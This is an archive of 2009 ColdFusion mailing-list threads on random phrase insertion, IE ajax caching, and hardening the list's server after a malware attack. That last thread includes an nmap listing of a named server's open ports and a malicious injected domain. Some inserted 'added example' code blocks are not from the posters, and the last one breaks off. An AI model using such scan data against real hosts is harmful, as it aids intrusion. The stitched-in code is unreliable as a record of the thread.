Re: Putting a random phrase after a sentence.
Thanks. I'll test it out and let you know how it goes. :)

On Thu, Sep 17, 2009 at 10:35 PM, Barney Boisvert wrote:
>
> 100% untested, but you get the idea:
>
> s = "The project is done.";
> strings = [
>     "and dinna spare the whip",
>     "and I sure am handsome"
>     // ...
> ];
> start = 1; // REFind positions are 1-based
> while (true) {
>     // any . ? ! preceded by a letter and followed by a space or end of string
>     start = REFind("[a-zA-Z][.?!]( |$)", s, start);
>     if (start == 0) {
>         break; // no match
>     }
>     if (randRange(1, 20) EQ 1) { // 5% chance
>         rs = strings[randRange(1, arrayLen(strings))];
>         // insert() returns a new string; position start is the letter before the punctuation
>         s = insert(", " & rs, s, start);
>         start += len(rs) + 2;
>     }
>     start += 2; // step past the punctuation so the same match is not found again
> }
>
> On Thu, Sep 17, 2009 at 10:15 PM, Phillip Vector wrote:
>>
>> Hey people. I'm working on a filter to put in some random text into my
>> pages. For example...
>>
>> The project is done.
>>
>> Becomes
>>
>> The project is done, and dinna spare the whip!
>>
>> (I think some of you know why I am doing this). :)
>>
>> Anyway, I don't want to have it appear after EVERY period or ! or ?..
>> I'd like to randomly put it (say, 5% chance every sentence).
>>
>> I'm thinking about looping over the text, character by character. When
>> it finds a period, it "rolls the dice" and perhaps does the
>> replacement based on the last few characters before the period. Then
>> keeps going.
>>
>> Does anyone have a less convoluted way of doing this (or something I
>> can plug and play into it)?

~|
Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326421
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Putting a random phrase after a sentence.
100% untested, but you get the idea:

s = "The project is done.";
strings = [
    "and dinna spare the whip",
    "and I sure am handsome"
    // ...
];
start = 1; // REFind positions are 1-based
while (true) {
    // any . ? ! preceded by a letter and followed by a space or end of string
    start = REFind("[a-zA-Z][.?!]( |$)", s, start);
    if (start == 0) {
        break; // no match
    }
    if (randRange(1, 20) EQ 1) { // 5% chance
        rs = strings[randRange(1, arrayLen(strings))];
        // insert() returns a new string; position start is the letter before the punctuation
        s = insert(", " & rs, s, start);
        start += len(rs) + 2;
    }
    start += 2; // step past the punctuation so the same match is not found again
}

On Thu, Sep 17, 2009 at 10:15 PM, Phillip Vector wrote:
>
> Hey people. I'm working on a filter to put in some random text into my
> pages. For example...
>
> The project is done.
>
> Becomes
>
> The project is done, and dinna spare the whip!
>
> (I think some of you know why I am doing this). :)
>
> Anyway, I don't want to have it appear after EVERY period or ! or ?..
> I'd like to randomly put it (say, 5% chance every sentence).
>
> I'm thinking about looping over the text, character by character. When
> it finds a period, it "rolls the dice" and perhaps does the
> replacement based on the last few characters before the period. Then
> keeps going.
>
> Does anyone have a less convoluted way of doing this (or something I
> can plug and play into it)?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326420
Putting a random phrase after a sentence.
Hey people. I'm working on a filter to put in some random text into my pages. For example...

The project is done.

Becomes

The project is done, and dinna spare the whip!

(I think some of you know why I am doing this). :)

Anyway, I don't want to have it appear after EVERY period or ! or ?.. I'd like to randomly put it (say, 5% chance every sentence).

I'm thinking about looping over the text, character by character. When it finds a period, it "rolls the dice" and perhaps does the replacement based on the last few characters before the period. Then keeps going.

Does anyone have a less convoluted way of doing this (or something I can plug and play into it)?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326419
Re: malware patterns
> Could they have been opened by a virus?

Well, I don't think it would be a virus in the traditional sense, no. But if you have access to the filesystem with SYSTEM or admin rights, you can do anything you want really.

> I've checked the whole system and if there was any Hentai on it, I'd know.

Really? Don't be so sure!

http://technet.microsoft.com/en-us/sysinternals/bb897440.aspx

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326418
Re: malware patterns
Oops, should have been off-list. Sorry!

On Thu, Sep 17, 2009 at 17:55, Dave Watts wrote:
>>> Fast question. On win2k is there an easy way of closing/blocking these
>>> or does it have to be further up the chain.
>>
>> Yes. You can do this with an IP security policy. However, I would also
>> recommend that you block all unwanted traffic at the gateway, of
>> course.
>
> If you like, I can probably send you a canned .ipsec file offlist
> which you can apply without having to learn the awful IP security
> policy interface.
>
> Frankly, I'm surprised you haven't had other problems, with SMB/CIFS
> exposed to the public. You may want to make sure you're not hosting
> any tentacle porn, etc. It wouldn't have to be web accessible, either,
> so you should probably check, well, everything.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326417
Re: malware patterns
Could they have been opened by a virus? I've checked the whole system and if there was any Hentai on it, I'd know.

> Frankly, I'm surprised you haven't had other problems, with SMB/CIFS
> exposed to the public. You may want to make sure you're not hosting
> any tentacle porn, etc. It wouldn't have to be web accessible, either,
> so you should probably check, well, everything.
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326416
Re: malware patterns
>> Fast question. On win2k is there an easy way of closing/blocking these
>> or does it have to be further up the chain.
>
> Yes. You can do this with an IP security policy. However, I would also
> recommend that you block all unwanted traffic at the gateway, of
> course.

If you like, I can probably send you a canned .ipsec file offlist which you can apply without having to learn the awful IP security policy interface.

Frankly, I'm surprised you haven't had other problems, with SMB/CIFS exposed to the public. You may want to make sure you're not hosting any tentacle porn, etc. It wouldn't have to be web accessible, either, so you should probably check, well, everything.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326415
Re: malware patterns
> Fast question. On win2k is there an easy way of closing/blocking these
> or does it have to be further up the chain.

Yes. You can do this with an IP security policy. However, I would also recommend that you block all unwanted traffic at the gateway, of course.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326414
RE: malware patterns
IPSec... that could get a little complicated. A firewall should be able to block this, as well as adding ACLs to the router.

-Original Message-
From: Michael Dinowitz [mailto:mdino...@houseoffusion.com]
Sent: Thursday, September 17, 2009 1:42 PM
To: cf-talk
Subject: Re: malware patterns

Fast question. On win2k is there an easy way of closing/blocking these or does it have to be further up the chain.

On Thu, Sep 17, 2009 at 4:33 PM, Jacob wrote:
>
> 135 and 445 should NOT be open to the public!
>
> -Original Message-
> From: b...@bradwood.com [mailto:b...@bradwood.com]
> Sent: Thursday, September 17, 2009 12:47 PM
> To: cf-talk
> Subject: RE: malware patterns
>
> Michael, a quick nMap shows the following ports are open on the server
> that houseoffusion.com resolves to (64.118.74.245).
>
> PORT     STATE SERVICE
> 21/tcp   open  ftp
> 80/tcp   open  http
> 135/tcp  open  msrpc
> 443/tcp  open  https
> 445/tcp  open  microsoft-ds
> 1025/tcp open  NFS-or-IIS
> 1036/tcp open  unknown
> 1041/tcp open  unknown
> 2522/tcp open  unknown
> 3389/tcp open  ms-term-serv
> 7999/tcp open  unknown
>
> Have you accounted for each program that is listening on these ports and
> can any of them be closed that aren't needed? You've got terminal services
> in there as well as Directory Services. I would audit the passwords on
> all the Windows accounts since they are the only thing keeping someone
> from using these ports.
>
> Also, did you ever find anything in your Windows logs? Security under
> Event Viewer should show you all authentication that happened prior to
> the attack.
>
> Also, on the complete random off-chance that your vulnerability was
> through a CFML file that got uploaded, taking a peek at your class files
> (which would be no small task) might reveal any compiled crumbs left
> behind by a rogue .cfm file that deleted itself after execution.
>
> If you are on SQL Server 2005, I have been able to get the SQL of
> recently run queries by looking in the cached execution plans.
>
> SELECT cached.*,
>        sqltext.*
> FROM sys.dm_exec_cached_plans cached
> CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext
>
> I know those are long shots, but the sooner you look, the more you might
> be able to uncover before the tracks slowly get covered.
>
> I do hope you are able to find the cause for the benefit of us all.
>
> ~Brad
>
> Original Message
> Subject: malware patterns
> From: Michael Dinowitz
> Date: Thu, September 17, 2009 2:08 pm
> To: cf-talk
>
> The recent attack on House of Fusion resulted in some useful
> information as to what you should look for. In general, all or most of
> the files with the following extensions were affected:
>

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326413
RE: How to prevent IE from caching content added via ajax?
Good to know, Josh! Thanks!

-Original Message-
From: Josh Nathanson [mailto:p...@oakcitygraphics.com]
Sent: Thursday, September 17, 2009 5:03 PM
To: cf-talk
Subject: RE: How to prevent IE from caching content added via ajax?

Oh...if you are using the load function, then you can just do this somewhere before it:

$.ajaxSetup({ cache: false });

This will make it so any and all subsequent ajax requests (including load) are not cached.

-- Josh

-Original Message-
From: Josh Nathanson [mailto:p...@oakcitygraphics.com]
Sent: Thursday, September 17, 2009 1:49 PM
To: cf-talk
Subject: RE: How to prevent IE from caching content added via ajax?

Did you set cache: false in your $.ajax params?

-- Josh

-Original Message-
From: Rick Faircloth [mailto:r...@whitestonemedia.com]
Sent: Thursday, September 17, 2009 1:42 PM
To: cf-talk
Subject: How to prevent IE from caching content added via ajax?

Poor title, but I couldn't get it all in there.

- got a page which loads a .cfm of content into a div via a jQuery .load function
- the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file
- when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content. FF does
- If I close IE and open the page again, the content is refreshed. Even refreshing the page using F5 doesn't help
- I've tried the meta tags and as well as the header
- None of those headers or meta tags are working - what else could I try?

Thanks for any suggestions!

Rick

---
"Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326412
RE: How to prevent IE from caching content added via ajax?
Thanks, Tony!

-Original Message-
From: Tony Bentley [mailto:t...@tonybentley.com]
Sent: Thursday, September 17, 2009 4:45 PM
To: cf-talk
Subject: Re: How to prevent IE from caching content added via ajax?

If you are loading via url:

function ts() {
    // build a value from the current time so each request URL differs
    var tr = '';
    var curDateTime = new Date();
    tr += curDateTime.getHours();
    tr += curDateTime.getMinutes();
    tr += curDateTime.getSeconds();
    return tr;
}
$("#myloaddiv").load("/ajaxDIV/index.cfm?id=" + id + "&ts=" + ts());

Otherwise, for an http post you just need to pass it as a parameter.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326411
RE: How to prevent IE from caching content added via ajax?
Yep...that's the first thing in the $.ajax settings...

But, I believe I've solved the problem. Usually when I use .load to add content in a .cfm file into a div, I use this:

$('#hiddenResult').load('../components/propertiesDisplay.cfm?' + new Date().getTime());

I had one other place in my code (pagination code) that involved loading that same page, but I didn't have the ' + new Date().getTime(); query string on the end. Once I added that again in this place and changed the content, IE loaded it fine.

Thanks for the tip, Josh!

Rick

-Original Message-
From: Josh Nathanson [mailto:p...@oakcitygraphics.com]
Sent: Thursday, September 17, 2009 4:49 PM
To: cf-talk
Subject: RE: How to prevent IE from caching content added via ajax?

Did you set cache: false in your $.ajax params?

-- Josh

-Original Message-
From: Rick Faircloth [mailto:r...@whitestonemedia.com]
Sent: Thursday, September 17, 2009 1:42 PM
To: cf-talk
Subject: How to prevent IE from caching content added via ajax?

Poor title, but I couldn't get it all in there.

- got a page which loads a .cfm of content into a div via a jQuery .load function
- the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file
- when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content. FF does
- If I close IE and open the page again, the content is refreshed. Even refreshing the page using F5 doesn't help
- I've tried the meta tags and as well as the header
- None of those headers or meta tags are working - what else could I try?

Thanks for any suggestions!

Rick

---
"Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326410
RE: How to prevent IE from caching content added via ajax?
Oh...if you are using the load function, then you can just do this somewhere before it:

$.ajaxSetup({ cache: false });

This will make it so any and all subsequent ajax requests (including load) are not cached.

-- Josh

-Original Message-
From: Josh Nathanson [mailto:p...@oakcitygraphics.com]
Sent: Thursday, September 17, 2009 1:49 PM
To: cf-talk
Subject: RE: How to prevent IE from caching content added via ajax?

Did you set cache: false in your $.ajax params?

-- Josh

-Original Message-
From: Rick Faircloth [mailto:r...@whitestonemedia.com]
Sent: Thursday, September 17, 2009 1:42 PM
To: cf-talk
Subject: How to prevent IE from caching content added via ajax?

Poor title, but I couldn't get it all in there.

- got a page which loads a .cfm of content into a div via a jQuery .load function
- the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file
- when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content. FF does
- If I close IE and open the page again, the content is refreshed. Even refreshing the page using F5 doesn't help
- I've tried the meta tags and as well as the header
- None of those headers or meta tags are working - what else could I try?

Thanks for any suggestions!

Rick

---
"Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326409
Re: malware patterns
Fast note. Some anti-virus programs are reporting this thread as having a virus due to the code fragment from the first post. This is a false positive, but if there is a concern, just use the website interface.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326408
Re: malware patterns
>>http://bgadf.cn>

Arg... Chinese junk again :-(

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326407
Re: How to prevent IE from caching content added via ajax?
If you are loading via url:

function ts() {
    // build a value from the current time so each request URL differs
    var tr = '';
    var curDateTime = new Date();
    tr += curDateTime.getHours();
    tr += curDateTime.getMinutes();
    tr += curDateTime.getSeconds();
    return tr;
}
$("#myloaddiv").load("/ajaxDIV/index.cfm?id=" + id + "&ts=" + ts());

Otherwise, for an http post you just need to pass it as a parameter.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326406
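Added example, not part of any poster's message: a cache-busting helper for the `.load()` URLs discussed in this thread, next to the hours/minutes/seconds stamp to show why a millisecond timestamp is the safer unique value. The names `hmsStamp` and `withCacheBuster` are hypothetical; the `_` parameter name mirrors what jQuery's `cache: false` appends.

```javascript
// Added example: helper names are hypothetical, sample URLs are taken from the thread.

// Hours + minutes + seconds without zero padding, as in the ts() approach above.
// Different times can collapse to the same string, so a cached copy may still be served.
function hmsStamp(date) {
  return '' + date.getHours() + date.getMinutes() + date.getSeconds();
}

// Append (or replace) a cache-busting parameter while keeping any existing
// query string and #fragment intact.
function withCacheBuster(url, now = Date.now(), param = '_') {
  const hashAt = url.indexOf('#');
  const fragment = hashAt === -1 ? '' : url.slice(hashAt);
  const base = hashAt === -1 ? url : url.slice(0, hashAt);

  const queryAt = base.indexOf('?');
  const path = queryAt === -1 ? base : base.slice(0, queryAt);
  const query = queryAt === -1 ? '' : base.slice(queryAt + 1);

  // Drop empty pairs and any stale copy of the cache-busting parameter.
  const kept = query
    .split('&')
    .filter((pair) => pair !== '' && pair.split('=')[0] !== param);
  kept.push(param + '=' + encodeURIComponent(String(now)));

  return path + '?' + kept.join('&') + fragment;
}

// Constructed sample times: 01:23:04 and 12:03:04 both stamp as "1234".
const early = new Date(2009, 8, 17, 1, 23, 4);
const later = new Date(2009, 8, 17, 12, 3, 4);
console.log(hmsStamp(early), hmsStamp(later));

// Millisecond timestamps differ for every request made at a different instant.
console.log(withCacheBuster('/ajaxDIV/index.cfm?id=7'));
console.log(withCacheBuster('../components/propertiesDisplay.cfm'));
```

In the browser the result is passed straight to jQuery, for example `$('#hiddenResult').load(withCacheBuster('../components/propertiesDisplay.cfm'))`.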
RE: How to prevent IE from caching content added via ajax?
Did you set cache: false in your $.ajax params?

-- Josh

-Original Message-
From: Rick Faircloth [mailto:r...@whitestonemedia.com]
Sent: Thursday, September 17, 2009 1:42 PM
To: cf-talk
Subject: How to prevent IE from caching content added via ajax?

Poor title, but I couldn't get it all in there.

- got a page which loads a .cfm of content into a div via a jQuery .load function
- the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file
- when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content. FF does
- If I close IE and open the page again, the content is refreshed. Even refreshing the page using F5 doesn't help
- I've tried the meta tags and as well as the header
- None of those headers or meta tags are working - what else could I try?

Thanks for any suggestions!

Rick

---
"Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326405
Re: malware patterns
Didn't mean to hit send...

Here is a tech article on doing it at the server level

http://support.microsoft.com/kb/813878

On Thu, Sep 17, 2009 at 1:46 PM, Alan Rother wrote:
> I would block them at the Firewall. You don't even want the traffic getting
> to the box.
> =]
>
> On Thu, Sep 17, 2009 at 1:42 PM, Michael Dinowitz <mdino...@houseoffusion.com> wrote:
>
>> Fast question. On win2k is there an easy way of closing/blocking these
>> or does it have to be further up the chain.
>>
>> On Thu, Sep 17, 2009 at 4:33 PM, Jacob wrote:
>> >
>> > 135 and 445 should NOT be open to the public!
>> >
>> > -Original Message-
>> > From: b...@bradwood.com [mailto:b...@bradwood.com]
>> > Sent: Thursday, September 17, 2009 12:47 PM
>> > To: cf-talk
>> > Subject: RE: malware patterns
>> >
>> > Michael, a quick nMap shows the following ports are open on the server
>> > that houseoffusion.com resolves to (64.118.74.245).
>> >
>> > PORT     STATE SERVICE
>> > 21/tcp   open  ftp
>> > 80/tcp   open  http
>> > 135/tcp  open  msrpc
>> > 443/tcp  open  https
>> > 445/tcp  open  microsoft-ds
>> > 1025/tcp open  NFS-or-IIS
>> > 1036/tcp open  unknown
>> > 1041/tcp open  unknown
>> > 2522/tcp open  unknown
>> > 3389/tcp open  ms-term-serv
>> > 7999/tcp open  unknown
>> >
>> > Have you accounted for each program that is listening on these ports and
>> > can any of them be closed that aren't needed? You've got terminal services
>> > in there as well as Directory Services. I would audit the passwords on
>> > all the Windows accounts since they are the only thing keeping someone
>> > from using these ports.
>> >
>> > Also, did you ever find anything in your Windows logs? Security under
>> > Event Viewer should show you all authentication that happened prior to
>> > the attack.
>> >
>> > Also, on the complete random off-chance that your vulnerability was
>> > through a CFML file that got uploaded, taking a peek at your class files
>> > (which would be no small task) might reveal any compiled crumbs left
>> > behind by a rogue .cfm file that deleted itself after execution.
>> >
>> > If you are on SQL Server 2005, I have been able to get the SQL of
>> > recently run queries by looking in the cached execution plans.
>> >
>> > SELECT cached.*,
>> >        sqltext.*
>> > FROM sys.dm_exec_cached_plans cached
>> > CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext
>> >
>> > I know those are long shots, but the sooner you look, the more you might
>> > be able to uncover before the tracks slowly get covered.
>> >
>> > I do hope you are able to find the cause for the benefit of us all.
>> >
>> > ~Brad
>> >
>> > Original Message
>> > Subject: malware patterns
>> > From: Michael Dinowitz
>> > Date: Thu, September 17, 2009 2:08 pm
>> > To: cf-talk
>> >
>> > The recent attack on House of Fusion resulted in some useful
>> > information as to what you should look for. In general, all or most of
>> > the files with the following extensions were affected:
>> >

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326404
RE: malware patterns
You can turn off Windows file and print sharing or enable the Windows firewall, but chances are you want those ports available to your internal network. Assuming this machine is behind a hardware firewall, that is the best place to lock down ports you don't want the outside world getting to. Or worst case, limit the outside IP addresses that have access to them.

Chances are, the only ports that really need to be publicly accessible on a web server are 80 and possibly 443.

~Brad

Original Message
Subject: Re: malware patterns
From: Michael Dinowitz
Date: Thu, September 17, 2009 3:42 pm
To: cf-talk

Fast question. On win2k is there an easy way of closing/blocking these or does it have to be further up the chain.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326403
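Added example, not part of any poster's message: a small triage of the port table quoted in this thread against the exposure rules the replies give (80 and 443 public, 135 and 445 never public, everything else needs an owner). The function names and the allowlist constants are assumptions made for this sketch; the scan rows are the ones quoted in the thread.

```javascript
// Added example: SCAN is the port table quoted in this thread; names are hypothetical.
const SCAN = `PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1036/tcp open  unknown
1041/tcp open  unknown
2522/tcp open  unknown
3389/tcp open  ms-term-serv
7999/tcp open  unknown`;

// Assumption: a web server that should expose only HTTP and HTTPS, as the thread suggests.
const PUBLIC_ALLOWLIST = new Set(['80/tcp', '443/tcp']);
// Ports the thread says must never face the internet (MSRPC and SMB/CIFS).
const NEVER_PUBLIC = new Set(['135/tcp', '445/tcp']);

// Parse "PORT STATE SERVICE" rows; the header and any other scanner output are skipped.
function parsePortTable(text) {
  const rows = [];
  for (const line of text.split(/\r?\n/)) {
    const m = /^\s*(\d{1,5})\/(tcp|udp)\s+(\S+)\s+(\S.*?)\s*$/.exec(line);
    if (!m) continue;
    const port = Number(m[1]);
    rows.push({ key: `${port}/${m[2]}`, port, state: m[3], service: m[4] });
  }
  return rows;
}

// Sort reachable ports into: block at the gateway, expected public, needs review.
function triage(rows) {
  const result = { block: [], expected: [], review: [] };
  for (const row of rows) {
    // "open|filtered" means the scanner could not rule the port out: treat as reachable.
    if (!row.state.split('|').includes('open')) continue;
    if (NEVER_PUBLIC.has(row.key)) result.block.push(row);
    else if (PUBLIC_ALLOWLIST.has(row.key)) result.expected.push(row);
    else result.review.push(row); // which program listens here, and must it be public?
  }
  return result;
}

function report(text) {
  const t = triage(parsePortTable(text));
  const fmt = (rows) => rows.map((r) => `${r.key} (${r.service})`).join(', ') || 'none';
  return [
    `block at the gateway: ${fmt(t.block)}`,
    `review and justify:   ${fmt(t.review)}`,
    `expected public:      ${fmt(t.expected)}`,
  ].join('\n');
}

console.log(report(SCAN));
```

Rerunning the same triage on a scan taken from outside the firewall after the rules change confirms that only the allowlisted ports remain reachable.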
Re: malware patterns
I would block them at the Firewall. You don't even want the traffic getting to the box.

=]

On Thu, Sep 17, 2009 at 1:42 PM, Michael Dinowitz <mdino...@houseoffusion.com> wrote:
>
> Fast question. On win2k is there an easy way of closing/blocking these
> or does it have to be further up the chain.
>
> On Thu, Sep 17, 2009 at 4:33 PM, Jacob wrote:
> >
> > 135 and 445 should NOT be open to the public!
> >
> > -Original Message-
> > From: b...@bradwood.com [mailto:b...@bradwood.com]
> > Sent: Thursday, September 17, 2009 12:47 PM
> > To: cf-talk
> > Subject: RE: malware patterns
> >
> > Michael, a quick nMap shows the following ports are open on the server
> > that houseoffusion.com resolves to (64.118.74.245).
> >
> > PORT     STATE SERVICE
> > 21/tcp   open  ftp
> > 80/tcp   open  http
> > 135/tcp  open  msrpc
> > 443/tcp  open  https
> > 445/tcp  open  microsoft-ds
> > 1025/tcp open  NFS-or-IIS
> > 1036/tcp open  unknown
> > 1041/tcp open  unknown
> > 2522/tcp open  unknown
> > 3389/tcp open  ms-term-serv
> > 7999/tcp open  unknown
> >
> > Have you accounted for each program that is listening on these ports and
> > can any of them be closed that aren't needed? You've got terminal services
> > in there as well as Directory Services. I would audit the passwords on
> > all the Windows accounts since they are the only thing keeping someone
> > from using these ports.
> >
> > Also, did you ever find anything in your Windows logs? Security under
> > Event Viewer should show you all authentication that happened prior to
> > the attack.
> >
> > Also, on the complete random off-chance that your vulnerability was
> > through a CFML file that got uploaded, taking a peek at your class files
> > (which would be no small task) might reveal any compiled crumbs left
> > behind by a rogue .cfm file that deleted itself after execution.
> >
> > If you are on SQL Server 2005, I have been able to get the SQL of
> > recently run queries by looking in the cached execution plans.
> >
> > SELECT cached.*,
> >        sqltext.*
> > FROM sys.dm_exec_cached_plans cached
> > CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext
> >
> > I know those are long shots, but the sooner you look, the more you might
> > be able to uncover before the tracks slowly get covered.
> >
> > I do hope you are able to find the cause for the benefit of us all.
> >
> > ~Brad
> >
> > Original Message
> > Subject: malware patterns
> > From: Michael Dinowitz
> > Date: Thu, September 17, 2009 2:08 pm
> > To: cf-talk
> >
> > The recent attack on House of Fusion resulted in some useful
> > information as to what you should look for. In general, all or most of
> > the files with the following extensions were affected:
> >

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326402
How to prevent IE from caching content added via ajax?
Poor title, but I couldn't get it all in there.

- got a page which loads a .cfm of content into a div via a jQuery .load function
- the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file
- when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content. FF does
- If I close IE and open the page again, the content is refreshed. Even refreshing the page using F5 doesn't help
- I've tried the meta tags and as well as the header
- None of those headers or meta tags are working - what else could I try?

Thanks for any suggestions!

Rick

---
"Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326401
Re: malware patterns
Fast question. On win2k is there an easy way of closing/blocking these or does it have to be further up the chain.

On Thu, Sep 17, 2009 at 4:33 PM, Jacob wrote:
>
> 135 and 445 should NOT be open to the public!
>
> -Original Message-
> From: b...@bradwood.com [mailto:b...@bradwood.com]
> Sent: Thursday, September 17, 2009 12:47 PM
> To: cf-talk
> Subject: RE: malware patterns
>
> Michael, a quick nMap shows the following ports are open on the server
> that houseoffusion.com resolves to (64.118.74.245).
>
> PORT     STATE SERVICE
> 21/tcp   open  ftp
> 80/tcp   open  http
> 135/tcp  open  msrpc
> 443/tcp  open  https
> 445/tcp  open  microsoft-ds
> 1025/tcp open  NFS-or-IIS
> 1036/tcp open  unknown
> 1041/tcp open  unknown
> 2522/tcp open  unknown
> 3389/tcp open  ms-term-serv
> 7999/tcp open  unknown
>
> Have you accounted for each program that is listening on these ports and
> can any of them be closed that aren't needed? You've got terminal services
> in there as well as Directory Services. I would audit the passwords on
> all the windows accounts since they are the only thing keeping someone
> from using these ports.
>
> Also, did you ever find anything in your Windows logs? Security under
> Event Viewer should show you all authentication that happened prior to
> the attack.
>
> Also, on the complete random off-chance that your vulnerability was
> through a CFML file that got uploaded, taking a peek at your class files
> (which would be no small task) might reveal any compiled crumbs left
> behind by a rogue .cfm file that deleted itself after execution.
>
> If you are on SQL Server 2005, I have been able to get the SQL of
> recently run queries by looking in the cached execution plans.
> SELECT cached.*,
> sqltext.*
> FROM sys.dm_exec_cached_plans cached
> CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext
>
> I know those are long shots, but the sooner you look, the more you might
> be able to uncover before the tracks slowly get covered.
>
> I do hope you are able to find the cause for the benefit of us all.
>
> ~Brad
>
> Original Message
> Subject: malware patterns
> From: Michael Dinowitz
> Date: Thu, September 17, 2009 2:08 pm
> To: cf-talk
>
> The recent attack on House of Fusion resulted in some useful
> information as to what you should look for. In general, all or most of
> the files with the following extensions were affected:
>

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326400
RE: malware patterns
135 and 445 should NOT be open to the public!

-Original Message-
From: b...@bradwood.com [mailto:b...@bradwood.com]
Sent: Thursday, September 17, 2009 12:47 PM
To: cf-talk
Subject: RE: malware patterns

Michael, a quick nMap shows the following ports are open on the server that houseoffusion.com resolves to (64.118.74.245).

PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1036/tcp open  unknown
1041/tcp open  unknown
2522/tcp open  unknown
3389/tcp open  ms-term-serv
7999/tcp open  unknown

Have you accounted for each program that is listening on these ports and can any of them be closed that aren't needed? You've got terminal services in there as well as Directory Services. I would audit the passwords on all the windows accounts since they are the only thing keeping someone from using these ports.

Also, did you ever find anything in your Windows logs? Security under Event Viewer should show you all authentication that happened prior to the attack.

Also, on the complete random off-chance that your vulnerability was through a CFML file that got uploaded, taking a peek at your class files (which would be no small task) might reveal any compiled crumbs left behind by a rogue .cfm file that deleted itself after execution.

If you are on SQL Server 2005, I have been able to get the SQL of recently run queries by looking in the cached execution plans.

SELECT cached.*,
sqltext.*
FROM sys.dm_exec_cached_plans cached
CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext

I know those are long shots, but the sooner you look, the more you might be able to uncover before the tracks slowly get covered.

I do hope you are able to find the cause for the benefit of us all.

~Brad

Original Message
Subject: malware patterns
From: Michael Dinowitz
Date: Thu, September 17, 2009 2:08 pm
To: cf-talk

The recent attack on House of Fusion resulted in some useful information as to what you should look for. In general, all or most of the files with the following extensions were affected:

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326399
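The port audit asked for in the message above, as an added example that is not code from the thread: it parses the posted port table and lists every open port outside an intended-public set. The set {80, 443}, the function names and the wording of the verdicts are assumptions made for the example; 135 and 445 are the ports called out in the reply.

```python
import re

# Port table as posted in the message above.
NMAP_OUTPUT = """\
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1036/tcp open  unknown
1041/tcp open  unknown
2522/tcp open  unknown
3389/tcp open  ms-term-serv
7999/tcp open  unknown
"""

# Assumption: this host is meant to expose only web traffic to the public.
INTENDED_PUBLIC = {80, 443}
# Ports the reply says should not be open to the public.
NOT_FOR_PUBLIC = {135, 445}

ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)$")


def parse_open_ports(text):
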